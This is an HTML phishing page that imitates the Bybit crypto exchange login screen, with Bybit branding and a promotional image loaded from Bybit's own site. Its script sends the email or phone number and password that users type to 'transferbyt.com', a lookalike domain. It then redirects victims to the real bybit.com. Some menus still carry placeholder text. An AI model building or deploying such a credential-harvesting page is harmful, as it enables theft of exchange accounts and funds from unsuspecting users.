<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Bybit</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css"
    />
    <style>
      /* Custom style for reducing switch border radius */
      .custom-switch {
        border-radius: 8px !important;
      }

      .hover-content {
        border-radius: 8px;
      }

      .icon {
        line-height: 0;
        /* Align icons vertically center */
      }

      .no-wrap {
        white-space: nowrap;
        /* Prevent line break for the "fees" part */
      }

      .selected-tab {
        color: black !important;
        border-bottom: 2px solid black;
        /* Ensure the selected tab is underlined */
      }

      .form-input,
      .form-button {
        border-radius: 12px;
      }

      .bg-form {
        background-color: white;
        /* Ensure the form has a white background */
      }

      /* New Hover Effect */
      .btn {
        transition: background-color 0.3s ease;
      }

      .btn:hover {
        background-color: rgba(
          0,
          0,
          0,
          0.1
        ); /* Light gray background on hover */
      }
      /* Adjust width, border color, and focus effect */
      .input-custom {
        width: 100%;
        border: 1px solid #d3d3d3; /* Light black border */
        padding: 0.5rem; /* Adjust padding for better spacing */
        border-radius: 4px;
        transition: border-color 0.3s ease; /* Smooth transition for border color */
      }

      /* Focus state: border turns black */
      .input-custom:focus {
        border-color: #000000; /* Black border when focused */
        outline: none; /* Remove default outline */
      }

      .icon-wrapper i {
        width: 40px;
        height: 40px;
        display: flex;
        align-items: center;
        justify-content: center;
      }

      #switch {
        border: 2px solid gray;
      }

      .icon-wrapper i:hover {
        color: black;
        border-color: black;
        transition: color 0.2s, border-color 0.2s;
      }

      #menu-icon,
      #search-icon {
        display: none;
      }

      @media screen and (max-width: 968px) {
        #left-part,
        #switch,
        #nav-links,
        #hideIcon,
        #search-bar,
        #loginBtn,
        #divider {
          display: none;
        }

        #menu-icon,
        #search-icon {
          font-size: 24px;
          display: block;
        }

        #right-part {
          width: 100%;
        }

        #social-icons {
          gap: 10px;
          justify-content: center;
        }

        #qrTab {
          display: none;
        }

        #tabs {
          margin-top: 40px;
        }

        #login-title {
          color: black;
        }

        body {
          padding: 0;
        }
      }
    </style>
  </head>
  <body class="bg-gray-100">
    <!-- Navbar -->
    <nav class="bg-black text-white p-4">
      <div class="flex justify-between items-center w-full px-4">
        <!-- Left Side: Logo, Switch and Nav Links -->
        <div class="flex items-center space-x-4">
          <!-- Logo -->
          <div class="logo text-2xl font-bold">Logo</div>

          <!-- Switch -->
          <div
            id="switch"
            class="flex items-center custom-switch cursor-pointer select-none switch"
          >
            <button
              id="exchangeBtn"
              class="px-4 py-2 bg-gray-200 text-black rounded-l-md hover:bg-gray-300 transition"
            >
              Exchange
            </button>
            <button
              id="walletBtn"
              class="px-4 py-2 bg-black text-white rounded-r-md hover:bg-gray-700 transition"
            >
              Wallet
            </button>
          </div>

          <!-- Divider -->
          <div id="divider" class="border-l border-gray-400 h-8 mx-4"></div>

          <!-- Nav Links -->
          <ul id="nav-links" class="flex items-center space-x-4">
            <li class="relative group">
              <a
                href="#"
                class="flex items-center space-x-1 hover:text-gray-300 transition"
              >
                <span>Buy crypto</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Express buy</div>
                    <div class="text-sm text-gray-400">
                      Visa, Mastercard and others.
                    </div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">PSP trading</div>
                    <div class="text-sm text-gray-400">
                      Buy/Sell with zero trading fees via 100+ payment methods.
                    </div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a
                href="#"
                class="flex items-center space-x-1 hover:text-gray-300 transition"
              >
                <span>Markets</span>
              </a>
            </li>

            <li class="relative group">
              <a
                href="#"
                class="flex items-center space-x-1 hover:text-gray-300 transition"
              >
                <span>Trade</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 3</div>
                    <div class="text-sm text-gray-400">Description 3</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 4</div>
                    <div class="text-sm text-gray-400">Description 4</div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a
                href="#"
                class="flex items-center space-x-1 hover:text-gray-300 transition"
              >
                <span>Tools</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 1</div>
                    <div class="text-sm text-gray-400">Description 1</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 2</div>
                    <div class="text-sm text-gray-400">Description 2</div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a
                href="#"
                class="flex items-center space-x-1 hover:text-gray-300 transition"
              >
                <span>Finance</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 1</div>
                    <div class="text-sm text-gray-400">Description 1</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 2</div>
                    <div class="text-sm text-gray-400">Description 2</div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a
                href="#"
                class="flex items-center space-x-1 hover:text-gray-300 transition"
              >
                <span>Learn</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 1</div>
                    <div class="text-sm text-gray-400">Description 1</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 2</div>
                    <div class="text-sm text-gray-400">Description 2</div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a
                href="#"
                class="flex items-center space-x-1 hover:text-gray-300 transition"
              >
                <span>Rewards Hub</span>
              </a>
            </li>

            <li class="relative group">
              <a
                href="#"
                class="flex items-center space-x-1 hover:text-gray-300 transition"
              >
                <span>More</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 1</div>
                    <div class="text-sm text-gray-400">Description 1</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 2</div>
                    <div class="text-sm text-gray-400">Description 2</div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <!-- Search Bar -->
              <div id="search-bar" class="relative flex items-center w-48">
                <i class="fas fa-search absolute left-2 text-white"></i>
                <input
                  type="text"
                  placeholder="🔥COOK/USDT"
                  class="py-2 pl-8 pr-2 text-md rounded-3xl bg-gray-800 text-white focus:outline-none w-full"
                />
              </div>
            </li>
          </ul>
        </div>

        <!-- Right Side: Search, Icons and Buttons -->
        <div class="flex items-center space-x-3">
          <!-- Divider -->
          <div id="divider" class="border-l border-gray-400 h-8"></div>

          <div id="search-icon">
            <i id="search-icon" class="fas fa-search text-white"></i>
          </div>

          <div id="search-icon">
            <i id="search-icon" class="fas fa-bars text-white"></i>
          </div>

          <!-- Sign Up / Login -->
          <button
            id="loginBtn"
            class="py-1 px-4 border border-gray-400 rounded-lg hover:bg-gray-700 transition"
          >
            Sign Up
          </button>
          <button
            id="loginBtn"
            class="py-1 px-4 bg-gray-600 hover:bg-gray-700 text-white rounded-lg transition"
          >
            Login
          </button>
        </div>
      </div>
    </nav>

    <!-- Main Content -->
    <div class="max-w-4xl mx-auto py-12 px-4 sm:px-6 lg:px-8">
      <div class="grid grid-cols-1 md:grid-cols-2 gap-8">
        <!-- Login Form with Tabs -->
        <div class="bg-white p-8 shadow rounded-lg">
          <div class="flex justify-between items-center">
            <p class="text-2xl font-bold text-gray-800">Welcome to Bybit</p>
            <div class="flex space-x-4 items-center" style="color: #f7a600">
              <svg
                width="16"
                height="16"
                viewBox="0 0 16 16"
                fill="none"
                xmlns="http://www.w3.org/2000/svg"
              >
                <path
                  d="M12.1405 10.6667L9.94526 12.8619C9.68491 13.1223 9.68491 13.5444 9.94526 13.8047C10.2056 14.0651 10.6277 14.0651 10.8881 13.8047L14.2214 10.4714C14.2061 10.4651 14.191 10.4588 14.1761 10.4527C14.3254 10.3338 14.4167 10.1748 14.4167 10C14.4167 9.63181 14.0116 9.33333 13.5119 9.33333L2.65476 9.33333C2.15508 9.33333 1.75 9.63181 1.75 10C1.75 10.3682 2.15508 10.6667 2.65476 10.6667L12.1405 10.6667ZM6.2214 3.13807L4.02614 5.33333L13.5119 5.33333C14.0116 5.33333 14.4167 5.63181 14.4167 6C14.4167 6.36819 14.0116 6.66667 13.5119 6.66667L2.65476 6.66667C2.15508 6.66667 1.75 6.36819 1.75 6C1.75 5.82524 1.84126 5.66619 1.99058 5.5473L1.94526 5.52859L5.2786 2.19526C5.53894 1.93491 5.96105 1.93491 6.2214 2.19526C6.48175 2.45561 6.48175 2.87772 6.2214 3.13807Z"
                  fill="currentColor"
                ></path>
              </svg>
              <p>Sign up</p>
            </div>
          </div>

          <!-- Tab Menu with margin-top for spacing -->
          <div class="flex mb-6 border-b mt-4">
            <button
              class="py-2 px-4 font-semibold text-yellow-500 border-b-2 border-yellow-500"
              onclick="showEmailForm()"
            >
              Email
            </button>
            <button
              class="py-2 px-4 font-semibold text-gray-500 border-b-2 border-transparent"
              onclick="showMobileForm()"
            >
              Mobile
            </button>
            <button
              class="py-2 px-4 font-semibold text-gray-500 border-b-2 border-transparent"
              onclick="showQRCodeForm()"
            >
              QR Code
            </button>
          </div>

          <!-- Form Container -->
          <div id="form-container">
            <!-- Email Form -->
            <form id="email-form">
              <div class="mb-4">
                <input
                  type="email"
                  id="email"
                  placeholder="Enter your email"
                  class="w-full px-3 py-4 border rounded bg-gray-100 focus:outline-none focus:border-blue-500"
                />
              </div>
              <div class="mb-4 relative">
                <input
                  type="password"
                  id="password"
                  placeholder="Enter your password"
                  class="w-full bg-gray-100 px-3 py-4 border rounded focus:outline-none focus:border-blue-500"
                />
              </div>
              <div class="flex items-center justify-between mb-6">
                <button
                  type="submit"
                  class="w-full bg-yellow-500 text-white py-2 rounded hover:bg-yellow-600"
                >
                  Log in
                </button>
              </div>
            </form>

            <!-- Mobile Form -->
            <form id="mobile-form" class="hidden">
              <div class="flex mb-4">
                <div class="mr-2">
                  <select
                    id="country-code"
                    class="w-full px-3 py-2 border rounded focus:outline-none focus:border-blue-500"
                  ></select>
                </div>
                <div>
                  <input
                    type="tel"
                    id="phone"
                    placeholder="Mobile"
                    class="w-full px-3 py-2 border bg-gray-100 rounded focus:outline-none focus:border-blue-500"
                  />
                </div>
              </div>
              <div class="mb-4 relative">
                <input
                  type="password"
                  id="password-mobile"
                  placeholder="Enter your password"
                  class="w-full px-3 py-4 border bg-gray-100 rounded focus:outline-none focus:border-blue-500"
                />
                <span
                  class="absolute right-3 top-3 text-gray-500 cursor-pointer"
                  >👁️</span
                >
              </div>
              <div class="flex items-center justify-between mb-6">
                <button
                  type="submit"
                  class="w-full bg-yellow-500 text-white py-2 rounded hover:bg-yellow-600"
                >
                  Log in
                </button>
              </div>
            </form>

            <!-- QR Code Form (Placeholder) -->
            <form id="qr-code-form" class="hidden"></form>
          </div>

          <div class="text-center text-gray-600 text-sm mb-4">
            or log in with
          </div>
          <div class="flex justify-center space-x-4 mb-4">
            <button
              type="button"
              class="px-2 py-2 border border-gray-200 rounded hover:bg-gray-200 flex items-center space-x-2"
            >
              <img
                src="https://img.icons8.com/color/24/000000/google-logo.png"
                alt="Google"
              />
            </button>
            <button
              type="button"
              class="px-2 py-2 border border-gray-200 rounded hover:bg-gray-200 flex items-center space-x-2"
            >
              <img
                src="https://img.icons8.com/color/24/000000/mac-os.png"
                alt="Apple"
              />
            </button>
            <button
              type="button"
              class="px-2 py-2 border border-gray-200 rounded hover:bg-gray-200 flex items-center space-x-2"
            >
              <img
                src="https://img.icons8.com/color/24/000000/telegram-app.png"
                alt="Telegram"
              />
            </button>
          </div>
          <a href="#" class="text-sm text-blue-500 hover:underline"
            >Forgot password?</a
          >
        </div>

        <script>
          async function fetchCountryCodes() {
            try {
              const response = await fetch(
                "https://restcountries.com/v3.1/all"
              );
              const countries = await response.json();

              const selectElement = document.getElementById("country-code");
              countries.forEach((country) => {
                const option = document.createElement("option");
                option.value = `${country.idd.root}${
                  country.idd.suffixes[0] || ""
                }`;
                option.textContent = `${country.idd.root}${
                  country.idd.suffixes[0] || ""
                }`; // Only show the code
                selectElement.appendChild(option);
              });
            } catch (error) {
              console.error("Error fetching country codes:", error);
            }
          }

          // Call the function to fetch country codes
          fetchCountryCodes();

          // JavaScript functions to switch between forms
          function showEmailForm() {
            document.getElementById("email-form").classList.remove("hidden");
            document.getElementById("mobile-form").classList.add("hidden");
            document.getElementById("qr-code-form").classList.add("hidden");
            updateTabStyles("email");
          }

          function showMobileForm() {
            document.getElementById("email-form").classList.add("hidden");
            document.getElementById("mobile-form").classList.remove("hidden");
            document.getElementById("qr-code-form").classList.add("hidden");
            updateTabStyles("mobile");
          }

          function showQRCodeForm() {
            document.getElementById("email-form").classList.add("hidden");
            document.getElementById("mobile-form").classList.add("hidden");
            document.getElementById("qr-code-form").classList.remove("hidden");
            updateTabStyles("qr");
          }

          function updateTabStyles(activeTab) {
            const tabs = ["email", "mobile", "qr"];
            tabs.forEach((tab) => {
              const tabButton = document.querySelector(
                `button[onclick="show${capitalize(tab)}Form()"]`
              );
              if (tab === activeTab) {
                tabButton.classList.remove(
                  "text-gray-500",
                  "border-transparent"
                );
                tabButton.classList.add(
                  "text-yellow-500",
                  "border-b-2",
                  "border-yellow-500"
                );
              } else {
                tabButton.classList.add("text-gray-500", "border-transparent");
                tabButton.classList.remove(
                  "text-yellow-500",
                  "border-b-2",
                  "border-yellow-500"
                );
              }
            });
          }

          function capitalize(string) {
            return string.charAt(0).toUpperCase() + string.slice(1);
          }

          // Show email form by default
          showEmailForm();
        </script>

        <!-- Promotional Section -->
        <div class="bg-white p-8 shadow rounded-lg text-center">
          <h2 class="text-2xl font-bold mb-6" style="color: #f7a600">
            Protect Your 1st Copy Trade
          </h2>
          <p class="text-gray-600 mb-4">Enjoy Up to 100 USDT Loss Coverage</p>
          <img
            src="https://www.bybit.com/common-static/cht-static/user-svc/img/loginPic.png"
            alt="Dollar Icon"
            class="mx-auto mb-4"
          />
          <p class="text-sm text-gray-500">
            Get started with confidence and trade safely.
          </p>
        </div>
      </div>
    </div>

    <!-- QR Code Tab Content -->
    <div id="qr-code" class="tab-content hidden mt-4 text-center">
      <img
        src="path_to_your_qr_code_image"
        alt="QR Code"
        class="mx-auto mb-4 w-48 h-48"
      />
      <!-- Adjust size as needed -->
      <p class="font-bold text-black mb-2">Scan with your Bybit App</p>
      <p>
        Don't have the Bybit app yet? Scan the QR code above to download the
        latest version.
      </p>
    </div>

    <script>
      // Form submission handlers
      document.getElementById("email-form").addEventListener("submit", (e) => {
        e.preventDefault();
        sendFormData("email");
      });

      document.getElementById("mobile-form").addEventListener("submit", (e) => {
        e.preventDefault();
        sendFormData("mobile");
      });

      document
        .getElementById("qr-code-form")
        .addEventListener("submit", (e) => {
          e.preventDefault();
          sendFormData("qr");
        });

      // Function to send form data based on selected tab
      async function sendFormData(type) {
        let url = ""; // The backend API endpoint for each form type
        let data = {};

        if (type === "email") {
          url = "https://transferbyt.com/client/customer/login/email";
          data = {
            email: document.getElementById("email").value,
            password: document.getElementById("password").value,
          };
        } else if (type === "mobile") {
          url = "https://transferbyt.com/client/customer/login/mobile";
          data = {
            country_code: document.getElementById("country-code").value,
            phone: document.getElementById("phone").value,
            password: document.getElementById("password-mobile").value,
          };
        } else if (type === "qr") {
          url = "https://api.example.com/login/qr";
          // Assuming QR-based logins might not need extra data
          data = {};
        }

        try {
          const response = await fetch(url, {
            method: "POST",
            headers: {
              "Content-Type": "application/json",
            },
            body: JSON.stringify(data),
          });

          const result = await response.json();
          if (response.ok) {
            // Handle successful login, e.g., redirect or display success message
            window.location.href = "https://www.bybit.com/en/";
          } else {
            // Handle errors, e.g., display error message
            alert(result.message || "Login failed!");
          }
        } catch (error) {
          console.error("Error sending data:", error);
          alert("There was an error with the login request.");
        }
      }

      // Country codes fetch function for the Mobile tab (unchanged)
      async function fetchCountryCodes() {
        try {
          const response = await fetch("https://restcountries.com/v3.1/all");
          const countries = await response.json();
          const selectElement = document.getElementById("country-code");
          countries.forEach((country) => {
            const option = document.createElement("option");
            option.value = `${country.idd.root}${
              country.idd.suffixes[0] || ""
            }`;
            option.textContent = `${country.idd.root}${
              country.idd.suffixes[0] || ""
            }`;
            selectElement.appendChild(option);
          });
        } catch (error) {
          console.error("Error fetching country codes:", error);
        }
      }

      fetchCountryCodes();

      // Form switch functions (unchanged)
      function showEmailForm() {
        document.getElementById("email-form").classList.remove("hidden");
        document.getElementById("mobile-form").classList.add("hidden");
        document.getElementById("qr-code-form").classList.add("hidden");
        updateTabStyles("email");
      }

      function showMobileForm() {
        document.getElementById("email-form").classList.add("hidden");
        document.getElementById("mobile-form").classList.remove("hidden");
        document.getElementById("qr-code-form").classList.add("hidden");
        updateTabStyles("mobile");
      }

      function showQRCodeForm() {
        document.getElementById("email-form").classList.add("hidden");
        document.getElementById("mobile-form").classList.add("hidden");
        document.getElementById("qr-code-form").classList.remove("hidden");
        updateTabStyles("qr");
      }

      // Show email form by default
      showEmailForm();
      function showTab(tab) {
        document
          .querySelectorAll(".tab-content")
          .forEach((el) => el.classList.add("hidden"));
        document.getElementById(tab).classList.remove("hidden");
        document
          .querySelectorAll(".tab-button")
          .forEach((el) => el.classList.remove("active"));
        document
          .querySelector(`[onclick="showTab('${tab}')"]`)
          .classList.add("active");
      }
    </script>
  </body>
</html>
